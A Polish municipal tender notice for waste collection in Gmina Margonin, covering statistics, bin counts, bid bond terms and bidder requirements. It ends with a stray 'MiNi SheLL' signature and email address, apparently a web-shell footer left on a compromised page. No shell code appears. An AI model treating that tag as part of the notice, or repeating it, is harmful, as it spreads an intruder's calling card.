7) Wszystkie pojazdy do świadczenia usługi muszą być wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisanie danych o położeniu pojazdu, miejscach pojazdów oraz system czujników zapisujących dane o miejscach wyładunku odpadów, system musi umożliwiać weryfikację tych danych.
8) Dane o położeniu pojazdów pochodzące z systemu monitoringu, powinny być przechowywane w siedzibie podmiotu odbierającego odpady komunalne od właścicieli nieruchomości przez okres 2 lat od dnia ich zapisania.
9) Wykonawca powinien posiadać oprogramowanie oraz odpowiednie licencje umożliwiające odczyt, prezentację i weryfikację przechowywanych danych oraz udostępnić je na każde żądanie organowi właściwemu ze względu na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, a także organom kontrolującym.
2.6. Dane ilościowe charakteryzujące Gminę Margonin
Dane mają charakter szacunkowy, w trakcie realizacji umowy mogą się zmieniać.
1) Margonin to gmina miejsko - wiejska obejmująca swym zasięgiem 515 ha.
W skład gminy wchodzi 21 miejscowości, charakteryzujących się przeważającą zabudową zwartą. W każdej miejscowości znajduje się zabudowa mniej lub bardziej rozproszona.
2) Liczba ludności w Gminie Margonin na dzień 31.12.2012r. wynosiła 6317 mieszkańców.
Dane dotyczące faktycznej liczny osób zamieszkałych zostaną określone na podstawie otrzymanych od właścicieli nieruchomości deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi i będą załącznikiem do umowy.
Wstępna analiza otrzymanych ankiet wykazuje że liczba osób zamieszkałych jest o około 12% mniejsza od liczby osób zameldowanych na teranie gminy Margonin.
3) Przyrost naturalny i migracje ludności w Gminie Margonin w latach 2010 - 2012:

                      2010		2011			2012
Akty zgonu	56		65			61
Akty urodzenia	 84		68			80

Zameldowania:
Stałe          	114		95			95
Czasowe               17                      39			104

Wymeldowania:
Stałe		140		143			112
Czasowe		  89		94			107
Liczba ludności        6378                  6328                             6317

4) Szacunkowa liczba nieruchomości z podziałem na typy nieruchomości, na dzień 31.12.2012r.:
Liczba nieruchomości zamieszkałych na których powstają odpady komunalne:
-	1445 budynków mieszkalnych jednorodzinnych,
-	65 budynków mieszkalnych wielorodzinnych.

5) Szacowana liczba pojemników niezbędna do prawidłowej realizacji zamówienia z podziałem na typ i pojemność.
Pojemniki   odpady           szkło         papier, plastik, metal
           zmieszne                      opakowania wielomat.                                      


120 litrów	700 szt.       691 szt.       700 szt.					
240 litrów            461 szt.       450 szt.        461 szt.
1100 litrów          19 szt.         18 szt.            19 szt.

6) Z analizy otrzymanych deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi wynika, że około 7% społeczeństwa będzie oddawało odpady w sposób niesegregowanych a 93% w sposób selektywny.
7) W latach 2008-2011 na terenie Gminy Margonin oddanych od użytku zostało 37 budynków mieszkalnych.
8) Występujące rodzaje i pojemności pojemników (kubłów) na odpady, przeznaczone do gromadzenia zmieszanych odpadów komunalnych na terenie nieruchomości Gminy:
metalowe lub z tworzywa sztucznego o pojemności 120 l, 240 l, 1100l oraz KP5, KP7, KP10 o pojemności od 5m3 do 10m3,
9) Poniższa tabela pokazuje ilości (w Mg) odbieranych odpadów komunalnych w Gminie Margonin, w latach 2010 - 2012:

Rodzaj odpadów    	             2010rok              2011 rok         2012 rok
Odzież			brak danych         4,26                     3,7
Papier                   	20,39		29,18		22,00
Szkło			58,58		84,41		78,00
Plastik			21,27		30,94		34,5
Baterie			0,064		0,148		0,132
AGD/RTV		              5,102		6,791		6,604
Niesegregowane
(zmieszane) odpady              1520,19            1473,34              1381,8
Komunalne

Suma			1625,53	            1629,07	       1526,74

Informujemy, że ww. latach na terenie Gminy Margonin nie nastąpił usystematyzowany odbiór odpadów jak: odpady komunalne ulegające biodegradacji, w tym odpady zielone
(z ogrodów), metal, meble i odpady wielkogabarytowe, akumulatory, chemikalia, zużyte opony, przeterminowane leki.
2.7. Wymiana danych z Wykonawcą:
a) Zamawiający na podstawie zmiany w deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi bądź nowej deklaracji będzie dokonywał bieżącej aktualizacji danych. Dane zostaną przekazane Wykonawcy do 10 dnia każdego miesiąca, następującego po miesiącu, w którym zgłoszone zostały zmiany,
b) Wykonawca w przypadku uzyskania informacji od Zamawiającego o zmianie ilości mieszkańców lub zmianie ilości i pojemności pojemników (na podstawie zmiany
w deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi, bądź nowej deklaracji) uwzględni w swojej ewidencji (kartotece) zmiany i wyposaży nieruchomość
w pojemniki oraz będzie odbierać odpady zgodnie z harmonogramem, poczynając
od miesiąca, następującego po miesiącu w którym Wykonawca otrzymał informację.
c) Zamawiający w czasie trwania umowy, udostępni wykonawcy niezwłocznie informacje o nieruchomościach zmieniających swój status użytkowania np. z nieruchomości zamieszkałej na nieruchomość na której nie powstają odpady komunalne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.10.00-2, 90.51.20.00-9, 90.51.40.00-3, 90.53.30.00-2, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10.000,00 zł, (słownie: dziesięć tysięcy złotych brutto 00/100).
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy: 
BS Chodzież/ oddz. Margonin 81 8945 0002 1300 0101 2000 0060 z adnotacją wadium - Świadczenie usługi odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin

2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) w terminie 23.05.2013, sposób przekazania: kserokopia wpłaty, kopie gwarancji i poręczeń załączyć do oferty oraz oryginały przedłożyć przed złożeniem oferty w pokoju nr 7. 
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
BS Chodzież/ oddz. Margonin 81 8945 0002 1300 0101 2000 0060 z adnotacją wadium - Świadczenie usługi odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy z terenu Gminy Margonin

5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
6. Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym zamawiającego.
7. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie.
9. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta / poręczyciela.
10. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
11. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
12. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
15. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania wynikającego z:
a) ustawy z dnia 14 grudnia 2012 roku o odpadach (Dz. U. z 2013 roku, poz. 21),
b) ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tekst jednolity: Dz. U. z 2012 roku, poz. 391 ze zmianami),
c) ustawy z dnia 29 lipca 2005 roku o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. z 2005 roku, Nr 180, poz. 1495 ze zmianami)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez wykonawcę realizacji co najmniej 1 usługi odpowiadającej swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
 tj.:
a) odbiór odpadów komunalnych o masie co najmniej 1.800 Mg i  łącznej wartości nie mniejszej niż 250.000,00 zł brutto, w okresie nie krótszym niż 12 kolejnych miesięcy.

Warunek zostanie uznany za spełniony na podstawie przedstawionego wykazu wykonanych usług - załącznik nr 4 do SIWZ wg rozdziału VI pkt. C.1. wraz                            z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie.
	Dowodami, o których mowa powyżej są:
- poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert
- oświadczenie - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia
W przypadku nie możności uzyskania powyższych dowodów Zamawiający dopuszcza możliwość przedłożenia dokumentów, o których mowa w § 9 ust. 2 w Rozporządzeniu Prezesa Rady Ministrów 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. poz. 231),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zgodnie z Rozporządzeniem Ministra Środowiska w sprawie szczegółowych wymagań w zakresie zbierania odpadów komunalnych od właścicieli nieruchomości z dnia 11 stycznia 2013r. (Dz. U. z 2013 r. poz. 122) Wykonawca zobowiązany jest posiadać co najmniej 5 sztuk pojazdów:
a)	pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych - co najmniej 2 pojazdy
b)	pojazdy przystosowane do odbierania selektywnie zebranych - co najmniej 2 pojazdy 
	c) pojazd do odbierania odpadów bez funkcji kompaktującej - co najmniej 1 pojazd
Warunek uznaje się za spełniony na podstawie przedstawionego wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy wraz z informacją o podstawie do dysponowania tymi zasobami. - załącznik nr 6 do SIWZ wg rozdziału VI pkt.  C.2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez wykonawcę - opłacona polisa OC a w przypadku jej braku inny dokumentu potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 250.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych 
Wykaz osób do kontaktów z zamawiającym
Wzór umowy- parafowany przez wykonawcę
Zobowiązanie innego podmiotu do oddania wykonawcy w dyspozycji niezbędnych zasobów  (o ile dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w następującym zakresie:
	a) jeżeli zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można było uniknąć ani im zapobiec,
	b) jeżeli nastąpiła siła wyższa - np. w postaci klęski żywiołowej,
	c) jeżeli warunki atmosferyczne uniemożliwiają prawidłowe wykonanie przedmiotu umowy,
	d) zmiany liczby pojemników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.margonin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Margonin
ul. Kościuszki 13
64-830 Margonin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy Margonin
ul. Kościuszki 13
64-830 Margonin
pokój - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com